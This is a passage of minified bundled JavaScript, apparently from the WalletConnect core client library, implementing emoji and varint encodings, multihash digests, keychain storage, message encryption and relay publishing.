DE08\uD83E\uDD18\uD83D\uDCA6✔\uD83D\uDE23\uD83C\uDFC3\uD83D\uDC90☹\uD83C\uDF8A\uD83D\uDC98\uD83D\uDE20☝\uD83D\uDE15\uD83C\uDF3A\uD83C\uDF82\uD83C\uDF3B\uD83D\uDE10\uD83D\uDD95\uD83D\uDC9D\uD83D\uDE4A\uD83D\uDE39\uD83D\uDDE3\uD83D\uDCAB\uD83D\uDC80\uD83D\uDC51\uD83C\uDFB5\uD83E\uDD1E\uD83D\uDE1B\uD83D\uDD34\uD83D\uDE24\uD83C\uDF3C\uD83D\uDE2B⚽\uD83E\uDD19☕\uD83C\uDFC6\uD83E\uDD2B\uD83D\uDC48\uD83D\uDE2E\uD83D\uDE46\uD83C\uDF7B\uD83C\uDF43\uD83D\uDC36\uD83D\uDC81\uD83D\uDE32\uD83C\uDF3F\uD83E\uDDE1\uD83C\uDF81⚡\uD83C\uDF1E\uD83C\uDF88❌✊\uD83D\uDC4B\uD83D\uDE30\uD83E\uDD28\uD83D\uDE36\uD83E\uDD1D\uD83D\uDEB6\uD83D\uDCB0\uD83C\uDF53\uD83D\uDCA2\uD83E\uDD1F\uD83D\uDE41\uD83D\uDEA8\uD83D\uDCA8\uD83E\uDD2C✈\uD83C\uDF80\uD83C\uDF7A\uD83E\uDD13\uD83D\uDE19\uD83D\uDC9F\uD83C\uDF31\uD83D\uDE16\uD83D\uDC76\uD83E\uDD74▶➡❓\uD83D\uDC8E\uD83D\uDCB8⬇\uD83D\uDE28\uD83C\uDF1A\uD83E\uDD8B\uD83D\uDE37\uD83D\uDD7A⚠\uD83D\uDE45\uD83D\uDE1F\uD83D\uDE35\uD83D\uDC4E\uD83E\uDD32\uD83E\uDD20\uD83E\uDD27\uD83D\uDCCC\uD83D\uDD35\uD83D\uDC85\uD83E\uDDD0\uD83D\uDC3E\uD83C\uDF52\uD83D\uDE17\uD83E\uDD11\uD83C\uDF0A\uD83E\uDD2F\uD83D\uDC37☎\uD83D\uDCA7\uD83D\uDE2F\uD83D\uDC86\uD83D\uDC46\uD83C\uDFA4\uD83D\uDE47\uD83C\uDF51❄\uD83C\uDF34\uD83D\uDCA3\uD83D\uDC38\uD83D\uDC8C\uD83D\uDCCD\uD83E\uDD40\uD83E\uDD22\uD83D\uDC45\uD83D\uDCA1\uD83D\uDCA9\uD83D\uDC50\uD83D\uDCF8\uD83D\uDC7B\uD83E\uDD10\uD83E\uDD2E\uD83C\uDFBC\uD83E\uDD75\uD83D\uDEA9\uD83C\uDF4E\uD83C\uDF4A\uD83D\uDC7C\uD83D\uDC8D\uD83D\uDCE3\uD83E\uDD42"), $e9e439c110f17033$var$Rs = $e9e439c110f17033$var$Ae.reduce((r, e, t)=>(r[t] = e, r), []), $e9e439c110f17033$var$Ts = $e9e439c110f17033$var$Ae.reduce((r, e, t)=>(r[e.codePointAt(0)] = t, r), []);
function $e9e439c110f17033$var$Ss(r) {
    return r.reduce((e, t)=>(e += $e9e439c110f17033$var$Rs[t], e), "");
}
function $e9e439c110f17033$var$Ps(r) {
    const e = [];
    for (const t of r){
        const i = $e9e439c110f17033$var$Ts[t.codePointAt(0)];
        if (i === void 0) throw new Error(`Non-base256emoji character: ${t}`);
        e.push(i);
    }
    return new Uint8Array(e);
}
const $e9e439c110f17033$var$Os = $e9e439c110f17033$var$H({
    prefix: "\uD83D\uDE80",
    name: "base256emoji",
    encode: $e9e439c110f17033$var$Ss,
    decode: $e9e439c110f17033$var$Ps
});
var $e9e439c110f17033$var$xs = Object.freeze({
    __proto__: null,
    base256emoji: $e9e439c110f17033$var$Os
}), $e9e439c110f17033$var$As = $e9e439c110f17033$var$Ne, $e9e439c110f17033$var$ze = 128, $e9e439c110f17033$var$zs = 127, $e9e439c110f17033$var$Ns = ~$e9e439c110f17033$var$zs, $e9e439c110f17033$var$Us = Math.pow(2, 31);
function $e9e439c110f17033$var$Ne(r, e, t) {
    e = e || [], t = t || 0;
    for(var i = t; r >= $e9e439c110f17033$var$Us;)e[t++] = r & 255 | $e9e439c110f17033$var$ze, r /= 128;
    for(; r & $e9e439c110f17033$var$Ns;)e[t++] = r & 255 | $e9e439c110f17033$var$ze, r >>>= 7;
    return e[t] = r | 0, $e9e439c110f17033$var$Ne.bytes = t - i + 1, e;
}
var $e9e439c110f17033$var$Ls = $e9e439c110f17033$var$ae, $e9e439c110f17033$var$$s = 128, $e9e439c110f17033$var$Ue = 127;
function $e9e439c110f17033$var$ae(r, i) {
    var t = 0, i = i || 0, s = 0, n = i, a, o = r.length;
    do {
        if (n >= o) throw $e9e439c110f17033$var$ae.bytes = 0, new RangeError("Could not decode varint");
        a = r[n++], t += s < 28 ? (a & $e9e439c110f17033$var$Ue) << s : (a & $e9e439c110f17033$var$Ue) * Math.pow(2, s), s += 7;
    }while (a >= $e9e439c110f17033$var$$s);
    return $e9e439c110f17033$var$ae.bytes = n - i, t;
}
var $e9e439c110f17033$var$Fs = Math.pow(2, 7), $e9e439c110f17033$var$Ms = Math.pow(2, 14), $e9e439c110f17033$var$Ks = Math.pow(2, 21), $e9e439c110f17033$var$ks = Math.pow(2, 28), $e9e439c110f17033$var$Bs = Math.pow(2, 35), $e9e439c110f17033$var$js = Math.pow(2, 42), $e9e439c110f17033$var$Vs = Math.pow(2, 49), $e9e439c110f17033$var$qs = Math.pow(2, 56), $e9e439c110f17033$var$Ys = Math.pow(2, 63), $e9e439c110f17033$var$Gs = function(r) {
    return r < $e9e439c110f17033$var$Fs ? 1 : r < $e9e439c110f17033$var$Ms ? 2 : r < $e9e439c110f17033$var$Ks ? 3 : r < $e9e439c110f17033$var$ks ? 4 : r < $e9e439c110f17033$var$Bs ? 5 : r < $e9e439c110f17033$var$js ? 6 : r < $e9e439c110f17033$var$Vs ? 7 : r < $e9e439c110f17033$var$qs ? 8 : r < $e9e439c110f17033$var$Ys ? 9 : 10;
}, $e9e439c110f17033$var$Js = {
    encode: $e9e439c110f17033$var$As,
    decode: $e9e439c110f17033$var$Ls,
    encodingLength: $e9e439c110f17033$var$Gs
}, $e9e439c110f17033$var$Le = $e9e439c110f17033$var$Js;
const $e9e439c110f17033$var$$e = (r, e, t = 0)=>($e9e439c110f17033$var$Le.encode(r, e, t), e), $e9e439c110f17033$var$Fe = (r)=>$e9e439c110f17033$var$Le.encodingLength(r), $e9e439c110f17033$var$oe = (r, e)=>{
    const t = e.byteLength, i = $e9e439c110f17033$var$Fe(r), s = i + $e9e439c110f17033$var$Fe(t), n = new Uint8Array(s + t);
    return $e9e439c110f17033$var$$e(r, n, 0), $e9e439c110f17033$var$$e(t, n, i), n.set(e, s), new $e9e439c110f17033$var$Hs(r, t, e, n);
};
class $e9e439c110f17033$var$Hs {
    constructor(e, t, i, s){
        this.code = e, this.size = t, this.digest = i, this.bytes = s;
    }
}
const $e9e439c110f17033$var$Me = ({ name: r, code: e, encode: t })=>new $e9e439c110f17033$var$Ws(r, e, t);
class $e9e439c110f17033$var$Ws {
    constructor(e, t, i){
        this.name = e, this.code = t, this.encode = i;
    }
    digest(e) {
        if (e instanceof Uint8Array) {
            const t = this.encode(e);
            return t instanceof Uint8Array ? $e9e439c110f17033$var$oe(this.code, t) : t.then((i)=>$e9e439c110f17033$var$oe(this.code, i));
        } else throw Error("Unknown type, must be binary type");
    }
}
const $e9e439c110f17033$var$Ke = (r)=>async (e)=>new Uint8Array(await crypto.subtle.digest(r, e)), $e9e439c110f17033$var$Xs = $e9e439c110f17033$var$Me({
    name: "sha2-256",
    code: 18,
    encode: $e9e439c110f17033$var$Ke("SHA-256")
}), $e9e439c110f17033$var$Zs = $e9e439c110f17033$var$Me({
    name: "sha2-512",
    code: 19,
    encode: $e9e439c110f17033$var$Ke("SHA-512")
});
var $e9e439c110f17033$var$Qs = Object.freeze({
    __proto__: null,
    sha256: $e9e439c110f17033$var$Xs,
    sha512: $e9e439c110f17033$var$Zs
});
const $e9e439c110f17033$var$ke = 0, $e9e439c110f17033$var$er = "identity", $e9e439c110f17033$var$Be = $e9e439c110f17033$var$Oe, $e9e439c110f17033$var$tr = (r)=>$e9e439c110f17033$var$oe($e9e439c110f17033$var$ke, $e9e439c110f17033$var$Be(r)), $e9e439c110f17033$var$ir = {
    code: $e9e439c110f17033$var$ke,
    name: $e9e439c110f17033$var$er,
    encode: $e9e439c110f17033$var$Be,
    digest: $e9e439c110f17033$var$tr
};
var $e9e439c110f17033$var$sr = Object.freeze({
    __proto__: null,
    identity: $e9e439c110f17033$var$ir
});
new TextEncoder, new TextDecoder;
const $e9e439c110f17033$var$je = {
    ...$e9e439c110f17033$var$Hi,
    ...$e9e439c110f17033$var$Xi,
    ...$e9e439c110f17033$var$Qi,
    ...$e9e439c110f17033$var$ts,
    ...$e9e439c110f17033$var$rs,
    ...$e9e439c110f17033$var$ps,
    ...$e9e439c110f17033$var$bs,
    ...$e9e439c110f17033$var$fs,
    ...$e9e439c110f17033$var$_s,
    ...$e9e439c110f17033$var$xs
};
({
    ...$e9e439c110f17033$var$Qs,
    ...$e9e439c110f17033$var$sr
});
function $e9e439c110f17033$var$Ve(r) {
    return globalThis.Buffer != null ? new Uint8Array(r.buffer, r.byteOffset, r.byteLength) : r;
}
function $e9e439c110f17033$var$rr(r = 0) {
    return globalThis.Buffer != null && globalThis.Buffer.allocUnsafe != null ? $e9e439c110f17033$var$Ve(globalThis.Buffer.allocUnsafe(r)) : new Uint8Array(r);
}
function $e9e439c110f17033$var$qe(r, e, t, i) {
    return {
        name: r,
        prefix: e,
        encoder: {
            name: r,
            prefix: e,
            encode: t
        },
        decoder: {
            decode: i
        }
    };
}
const $e9e439c110f17033$var$Ye = $e9e439c110f17033$var$qe("utf8", "u", (r)=>"u" + new TextDecoder("utf8").decode(r), (r)=>new TextEncoder().encode(r.substring(1))), $e9e439c110f17033$var$he = $e9e439c110f17033$var$qe("ascii", "a", (r)=>{
    let e = "a";
    for(let t = 0; t < r.length; t++)e += String.fromCharCode(r[t]);
    return e;
}, (r)=>{
    r = r.substring(1);
    const e = $e9e439c110f17033$var$rr(r.length);
    for(let t = 0; t < r.length; t++)e[t] = r.charCodeAt(t);
    return e;
}), $e9e439c110f17033$var$nr = {
    utf8: $e9e439c110f17033$var$Ye,
    "utf-8": $e9e439c110f17033$var$Ye,
    hex: $e9e439c110f17033$var$je.base16,
    latin1: $e9e439c110f17033$var$he,
    ascii: $e9e439c110f17033$var$he,
    binary: $e9e439c110f17033$var$he,
    ...$e9e439c110f17033$var$je
};
function $e9e439c110f17033$var$ar(r, e = "utf8") {
    const t = $e9e439c110f17033$var$nr[e];
    if (!t) throw new Error(`Unsupported encoding "${e}"`);
    return (e === "utf8" || e === "utf-8") && globalThis.Buffer != null && globalThis.Buffer.from != null ? $e9e439c110f17033$var$Ve(globalThis.Buffer.from(r, "utf-8")) : t.decoder.decode(`${t.prefix}${r}`);
}
const $e9e439c110f17033$export$51b1c900ac262bdf = "wc", $e9e439c110f17033$export$f30bd3c8747cdfbe = 2, $e9e439c110f17033$export$d47601f9de5ee22b = "core", $e9e439c110f17033$export$f258d29ae5e3d545 = `${$e9e439c110f17033$export$51b1c900ac262bdf}@2:${$e9e439c110f17033$export$d47601f9de5ee22b}:`, $e9e439c110f17033$export$db0fdb6d486555c2 = {
    name: $e9e439c110f17033$export$d47601f9de5ee22b,
    logger: "error"
}, $e9e439c110f17033$export$ba920abfe854b85d = {
    database: ":memory:"
}, $e9e439c110f17033$export$92a79f21481c803d = "crypto", $e9e439c110f17033$export$3613aa6e652146e4 = "client_ed25519_seed", $e9e439c110f17033$export$c4bc5e31a4d0ec78 = (0, $aG48A.ONE_DAY), $e9e439c110f17033$export$9d7218f72e8dc49b = "keychain", $e9e439c110f17033$export$34f82f4ba0c3d769 = "0.3", $e9e439c110f17033$export$9662bbc7d10cf481 = "messages", $e9e439c110f17033$export$19dfd1896412c038 = "0.3", $e9e439c110f17033$export$8ddbe6611b67d926 = (0, $aG48A.SIX_HOURS), $e9e439c110f17033$export$9d92662178f2abd1 = "publisher", $e9e439c110f17033$export$822d0bd1635d5360 = "irn", $e9e439c110f17033$export$5176ffa6778d6637 = "error", $e9e439c110f17033$export$a68061e6c48f332a = "wss://relay.walletconnect.com", $e9e439c110f17033$export$27fee22bec112637 = "wss://relay.walletconnect.org", $e9e439c110f17033$export$602d6e27611c3fcb = "relayer", $e9e439c110f17033$export$d56245796e2837d = {
    message: "relayer_message",
    message_ack: "relayer_message_ack",
    connect: "relayer_connect",
    disconnect: "relayer_disconnect",
    error: "relayer_error",
    connection_stalled: "relayer_connection_stalled",
    transport_closed: "relayer_transport_closed",
    publish: "relayer_publish"
}, $e9e439c110f17033$export$119b4645f6b233c8 = "_subscription", $e9e439c110f17033$export$58062acf2f31ddf8 = {
    payload: "payload",
    connect: "connect",
    disconnect: "disconnect",
    error: "error"
}, $e9e439c110f17033$export$11ccd39be2c57d6 = (0, $aG48A.ONE_SECOND) / 2, $e9e439c110f17033$export$44b621f74f0f4c93 = {
    database: ":memory:"
}, $e9e439c110f17033$export$5f30917a6f8c9025 = "2.9.2", $e9e439c110f17033$export$fb3eab7adf12329d = 1e4, $e9e439c110f17033$export$629a342182ba24b = "0.3", $e9e439c110f17033$export$9e4ca561755938da = "WALLETCONNECT_CLIENT_ID", $e9e439c110f17033$export$24ff3e54e94ef413 = {
    created: "subscription_created",
    deleted: "subscription_deleted",
    expired: "subscription_expired",
    disabled: "subscription_disabled",
    sync: "subscription_sync",
    resubscribed: "subscription_resubscribed"
}, $e9e439c110f17033$export$9d35d0a6a3599be = (0, $aG48A.THIRTY_DAYS), $e9e439c110f17033$export$9c3a96bb670cddb8 = "subscription", $e9e439c110f17033$export$fb57e03bef4c4cea = "0.3", $e9e439c110f17033$export$9a2ddbfe54f8af77 = (0, $aG48A.FIVE_SECONDS) * 1e3, $e9e439c110f17033$export$390360ea476c6145 = "pairing", $e9e439c110f17033$export$5593ec74b27d1b18 = "0.3", $e9e439c110f17033$export$ee4b1978d0aedfad = (0, $aG48A.THIRTY_DAYS), $e9e439c110f17033$export$d94d6986a8185883 = {
    wc_pairingDelete: {
        req: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1e3
        },
        res: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1001
        }
    },
    wc_pairingPing: {
        req: {
            ttl: (0, $aG48A.THIRTY_SECONDS),
            prompt: !1,
            tag: 1002
        },
        res: {
            ttl: (0, $aG48A.THIRTY_SECONDS),
            prompt: !1,
            tag: 1003
        }
    },
    unregistered_method: {
        req: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 0
        },
        res: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 0
        }
    }
}, $e9e439c110f17033$export$a682338b5ffca937 = {
    created: "history_created",
    updated: "history_updated",
    deleted: "history_deleted",
    sync: "history_sync"
}, $e9e439c110f17033$export$160142c73cb99dc3 = "history", $e9e439c110f17033$export$8eba9ce85616c607 = "0.3", $e9e439c110f17033$export$4ddf883392bbc828 = "expirer", $e9e439c110f17033$export$9013719d9206b0c1 = {
    created: "expirer_created",
    deleted: "expirer_deleted",
    expired: "expirer_expired",
    sync: "expirer_sync"
}, $e9e439c110f17033$export$717295846191925d = "0.3", $e9e439c110f17033$export$3cfe73d6765db74 = (0, $aG48A.ONE_DAY), $e9e439c110f17033$export$3b58f2450f2297e3 = "verify-api", $e9e439c110f17033$export$7e3b1a28ddecdbaa = "https://verify.walletconnect.com";
class $e9e439c110f17033$export$dd4508d2540f08d3 {
    constructor(e, t){
        this.core = e, this.logger = t, this.keychain = new Map, this.name = $e9e439c110f17033$export$9d7218f72e8dc49b, this.version = $e9e439c110f17033$export$34f82f4ba0c3d769, this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.init = async ()=>{
            if (!this.initialized) {
                const i = await this.getKeyChain();
                typeof i < "u" && (this.keychain = i), this.initialized = !0;
            }
        }, this.has = (i)=>(this.isInitialized(), this.keychain.has(i)), this.set = async (i, s)=>{
            this.isInitialized(), this.keychain.set(i, s), await this.persist();
        }, this.get = (i)=>{
            this.isInitialized();
            const s = this.keychain.get(i);
            if (typeof s > "u") {
                const { message: n } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `${this.name}: ${i}`);
                throw new Error(n);
            }
            return s;
        }, this.del = async (i)=>{
            this.isInitialized(), this.keychain.delete(i), await this.persist();
        }, this.core = e, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    async setKeyChain(e) {
        await this.core.storage.setItem(this.storageKey, (0, $a5d33cfc7f8e5437$export$c4b8dfeb6e237eb9)(e));
    }
    async getKeyChain() {
        const e = await this.core.storage.getItem(this.storageKey);
        return typeof e < "u" ? (0, $a5d33cfc7f8e5437$export$ac31b37c726bc3ba)(e) : void 0;
    }
    async persist() {
        await this.setKeyChain(this.keychain);
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$export$8ac8b6291b7ccf24 {
    constructor(e, t, i){
        this.core = e, this.logger = t, this.name = $e9e439c110f17033$export$92a79f21481c803d, this.initialized = !1, this.init = async ()=>{
            this.initialized || (await this.keychain.init(), this.initialized = !0);
        }, this.hasKeys = (s)=>(this.isInitialized(), this.keychain.has(s)), this.getClientId = async ()=>{
            this.isInitialized();
            const s = await this.getClientSeed(), n = $2281914794d9e636$export$a949d36eab55b41f(s);
            return $f6e90d472e8dfc29$export$1b29ef9371459e10(n.publicKey);
        }, this.generateKeyPair = ()=>{
            this.isInitialized();
            const s = (0, $a5d33cfc7f8e5437$export$a949d36eab55b41f)();
            return this.setPrivateKey(s.publicKey, s.privateKey);
        }, this.signJWT = async (s)=>{
            this.isInitialized();
            const n = await this.getClientSeed(), a = $2281914794d9e636$export$a949d36eab55b41f(n), o = (0, $a5d33cfc7f8e5437$export$d15a28e4f1821243)(), h = $e9e439c110f17033$export$c4bc5e31a4d0ec78;
            return await $2281914794d9e636$export$a8dda30659d36d45(o, s, h, a);
        }, this.generateSharedKey = (s, n, a)=>{
            this.isInitialized();
            const o = this.getPrivateKey(s), h = (0, $a5d33cfc7f8e5437$export$f8378f68e053f5c6)(o, n);
            return this.setSymKey(h, a);
        }, this.setSymKey = async (s, n)=>{
            this.isInitialized();
            const a = n || (0, $a5d33cfc7f8e5437$export$1e87d19d4aab5805)(s);
            return await this.keychain.set(a, s), a;
        }, this.deleteKeyPair = async (s)=>{
            this.isInitialized(), await this.keychain.del(s);
        }, this.deleteSymKey = async (s)=>{
            this.isInitialized(), await this.keychain.del(s);
        }, this.encode = async (s, n, a)=>{
            this.isInitialized();
            const o = (0, $a5d33cfc7f8e5437$export$7949f60f2444aef2)(a), h = (0, $81c2e06d24b89184$export$abc3f407e87918a4)(n);
            if ((0, $a5d33cfc7f8e5437$export$8c165704db2d5c15)(o)) {
                const y = o.senderPublicKey, k = o.receiverPublicKey;
                s = await this.generateSharedKey(y, k);
            }
            const l = this.getSymKey(s), { type: d, senderPublicKey: b } = o;
            return (0, $a5d33cfc7f8e5437$export$5b0f6292f11d1d18)({
                type: d,
                symKey: l,
                message: h,
                senderPublicKey: b
            });
        }, this.decode = async (s, n, a)=>{
            this.isInitialized();
            const o = (0, $a5d33cfc7f8e5437$export$177f3e316562333d)(n, a);
            if ((0, $a5d33cfc7f8e5437$export$8c165704db2d5c15)(o)) {
                const h = o.receiverPublicKey, l = o.senderPublicKey;
                s = await this.generateSharedKey(h, l);
            }
            try {
                const h = this.getSymKey(s), l = (0, $a5d33cfc7f8e5437$export$e85a0c9a1067c5d3)({
                    symKey: h,
                    encoded: n
                });
                return (0, $81c2e06d24b89184$export$84137bb44359aed5)(l);
            } catch (h) {
                this.logger.error(`Failed to decode message from topic: '${s}', clientId: '${await this.getClientId()}'`), this.logger.error(h);
            }
        }, this.getPayloadType = (s)=>{
            const n = (0, $a5d33cfc7f8e5437$export$efcd34ab6248d3cd)(s);
            return (0, $a5d33cfc7f8e5437$export$7547a514ee29b9d4)(n.type);
        }, this.getPayloadSenderPublicKey = (s)=>{
            const n = (0, $a5d33cfc7f8e5437$export$efcd34ab6248d3cd)(s);
            return n.senderPublicKey ? (0, $74e9859baf4497ef$exports.toString)(n.senderPublicKey, (0, $a5d33cfc7f8e5437$export$49eb910ab2518105)) : void 0;
        }, this.core = e, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.keychain = i || new $e9e439c110f17033$export$dd4508d2540f08d3(this.core, this.logger);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    async setPrivateKey(e, t) {
        return await this.keychain.set(e, t), e;
    }
    getPrivateKey(e) {
        return this.keychain.get(e);
    }
    async getClientSeed() {
        let e = "";
        try {
            e = this.keychain.get($e9e439c110f17033$export$3613aa6e652146e4);
        } catch  {
            e = (0, $a5d33cfc7f8e5437$export$d15a28e4f1821243)(), await this.keychain.set($e9e439c110f17033$export$3613aa6e652146e4, e);
        }
        return $e9e439c110f17033$var$ar(e, "base16");
    }
    getSymKey(e) {
        return this.keychain.get(e);
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$export$4a2542d0790ac2fd extends (0, $bace94c1ef08d1bc$export$e67570fe0a885c47) {
    constructor(e, t){
        super(e, t), this.logger = e, this.core = t, this.messages = new Map, this.name = $e9e439c110f17033$export$9662bbc7d10cf481, this.version = $e9e439c110f17033$export$19dfd1896412c038, this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.init = async ()=>{
            if (!this.initialized) {
                this.logger.trace("Initialized");
                try {
                    const i = await this.getRelayerMessages();
                    typeof i < "u" && (this.messages = i), this.logger.debug(`Successfully Restored records for ${this.name}`), this.logger.trace({
                        type: "method",
                        method: "restore",
                        size: this.messages.size
                    });
                } catch (i) {
                    this.logger.debug(`Failed to Restore records for ${this.name}`), this.logger.error(i);
                } finally{
                    this.initialized = !0;
                }
            }
        }, this.set = async (i, s)=>{
            this.isInitialized();
            const n = (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(s);
            let a = this.messages.get(i);
            return typeof a > "u" && (a = {}), typeof a[n] < "u" || (a[n] = s, this.messages.set(i, a), await this.persist()), n;
        }, this.get = (i)=>{
            this.isInitialized();
            let s = this.messages.get(i);
            return typeof s > "u" && (s = {}), s;
        }, this.has = (i, s)=>{
            this.isInitialized();
            const n = this.get(i), a = (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(s);
            return typeof n[a] < "u";
        }, this.del = async (i)=>{
            this.isInitialized(), this.messages.delete(i), await this.persist();
        }, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(e, this.name), this.core = t;
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    async setRelayerMessages(e) {
        await this.core.storage.setItem(this.storageKey, (0, $a5d33cfc7f8e5437$export$c4b8dfeb6e237eb9)(e));
    }
    async getRelayerMessages() {
        const e = await this.core.storage.getItem(this.storageKey);
        return typeof e < "u" ? (0, $a5d33cfc7f8e5437$export$ac31b37c726bc3ba)(e) : void 0;
    }
    async persist() {
        await this.setRelayerMessages(this.messages);
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$var$lr extends (0, $bace94c1ef08d1bc$export$3b0872bbd7e675a2) {
    constructor(e, t){
        super(e, t), this.relayer = e, this.logger = t, this.events = new (0, $7etJZ.EventEmitter), this.name = $e9e439c110f17033$export$9d92662178f2abd1, this.queue = new Map, this.publishTimeout = (0, $aG48A.toMiliseconds)((0, $aG48A.TEN_SECONDS)), this.queueTimeout = (0, $aG48A.toMiliseconds)((0, $aG48A.FIVE_SECONDS)), this.needsTransportRestart = !1, this.publish = async (i, s, n)=>{
            this.logger.debug("Publishing Payload"), this.logger.trace({
                type: "method",
                method: "publish",
                params: {
                    topic: i,
                    message: s,
                    opts: n
                }
            });
            try {
                const a = n?.ttl || $e9e439c110f17033$export$8ddbe6611b67d926, o = (0, $a5d33cfc7f8e5437$export$cf77af25151525db)(n), h = n?.prompt || !1, l = n?.tag || 0, d = n?.id || (0, $3bb3ddc7bbc938cc$export$799a3db5df197877)().toString(), b = {
                    topic: i,
                    message: s,
                    opts: {
                        ttl: a,
                        relay: o,
                        prompt: h,
                        tag: l,
                        id: d
                    }
                }, y = setTimeout(()=>this.queue.set(d, b), this.queueTimeout);
                try {
                    await await (0, $a5d33cfc7f8e5437$export$3da2293b007ed708)(this.rpcPublish(i, s, a, o, h, l, d), this.publishTimeout), clearTimeout(y), this.relayer.events.emit($e9e439c110f17033$export$d56245796e2837d.publish, b);
                } catch  {
                    this.logger.debug("Publishing Payload stalled"), this.needsTransportRestart = !0;
                    return;
                }
                this.logger.debug("Successfully Published Payload"), this.logger.trace({
                    type: "method",
                    method: "publish",
                    params: {
                        topic: i,
                        message: s,
                        opts: n
                    }
                });
            } catch (a) {
                throw this.logger.debug("Failed to Publish Payload"), this.logger.error(a), a;
            }
        }, this.on = (i, s)=>{
            this.events.on(i, s);
        }, this.once = (i, s)=>{
            this.events.once(i, s);
        }, this.off = (i, s)=>{
            this.events.off(i, s);
        }, this.removeListener = (i, s)=>{
            this.events.removeListener(i, s);
        }, this.relayer = e, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.registerEventListeners();
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    rpcPublish(e, t, i, s, n, a, o) {
        var h, l, d, b;
        const y = {
            method: (0, $a5d33cfc7f8e5437$export$604e3deb95e1b734)(s.protocol).publish,
            params: {
                topic: e,
                message: t,
                ttl: i,
                prompt: n,
                tag: a
            },
            id: o
        };
        return (0, $a5d33cfc7f8e5437$export$fce6876652108ab)((h = y.params) == null ? void 0 : h.prompt) && ((l = y.params) == null || delete l.prompt), (0, $a5d33cfc7f8e5437$export$fce6876652108ab)((d = y.params) == null ? void 0 : d.tag) && ((b = y.params) == null || delete b.tag), this.logger.debug("Outgoing Relay Payload"), this.logger.trace({
            type: "message",
            direction: "outgoing",
            request: y
        }), this.relayer.request(y);
    }
    onPublish(e) {
        this.queue.delete(e);
    }
    checkQueue() {
        this.queue.forEach(async (e)=>{
            const { topic: t, message: i, opts: s } = e;
            await this.publish(t, i, s);
        });
    }
    registerEventListeners() {
        this.relayer.core.heartbeat.on((0, $212993b948b3fe4b$exports.HEARTBEAT_EVENTS).pulse, ()=>{
            if (this.needsTransportRestart) {
                this.needsTransportRestart = !1, this.relayer.events.emit($e9e439c110f17033$export$d56245796e2837d.connection_stalled);
                return;
            }
            this.checkQueue();
        }), this.relayer.on($e9e439c110f17033$export$d56245796e2837d.message_ack, (e)=>{
            this.onPublish(e.id.toString());
        });
    }
}
class $e9e439c110f17033$var$dr {
    constructor(){
        this.map = new Map, this.set = (e, t)=>{
            const i = this.get(e);
            this.exists(e, t) || this.map.set(e, [
                ...i,
                t
            ]);
        }, this.get = (e)=>this.map.get(e) || [], this.exists = (e, t)=>this.get(e).includes(t), this.delete = (e, t)=>{
            if (typeof t > "u") {
                this.map.delete(e);
                return;
            }
            if (!this.map.has(e)) return;
            const i = this.get(e);
            if (!this.exists(e, t)) return;
            const s = i.filter((n)=>n !== t);
            if (!s.length) {
                this.map.delete(e);
                return;
            }
            this.map.set(e, s);
        }, this.clear = ()=>{
            this.map.clear();
        };
    }
    get topics() {
        return Array.from(this.map.keys());
    }
}
var $e9e439c110f17033$var$gr = Object.defineProperty, $e9e439c110f17033$var$pr = Object.defineProperties, $e9e439c110f17033$var$Dr = Object.getOwnPropertyDescriptors, $e9e439c110f17033$var$_t = Object.getOwnPropertySymbols, $e9e439c110f17033$var$yr = Object.prototype.hasOwnProperty, $e9e439c110f17033$var$br = Object.prototype.propertyIsEnumerable, $e9e439c110f17033$var$Rt = (r, e, t)=>e in r ? $e9e439c110f17033$var$gr(r, e, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : r[e] = t, $e9e439c110f17033$var$K = (r, e)=>{
    for(var t in e || (e = {}))$e9e439c110f17033$var$yr.call(e, t) && $e9e439c110f17033$var$Rt(r, t, e[t]);
    if ($e9e439c110f17033$var$_t) for (var t of $e9e439c110f17033$var$_t(e))$e9e439c110f17033$var$br.call(e, t) && $e9e439c110f17033$var$Rt(r, t, e[t]);
    return r;
}, $e9e439c110f17033$var$pe = (r, e)=>$e9e439c110f17033$var$pr(r, $e9e439c110f17033$var$Dr(e));
class $e9e439c110f17033$export$60959659b2c22881 extends (0, $bace94c1ef08d1bc$export$300eed987e764b57) {
    constructor(e, t){
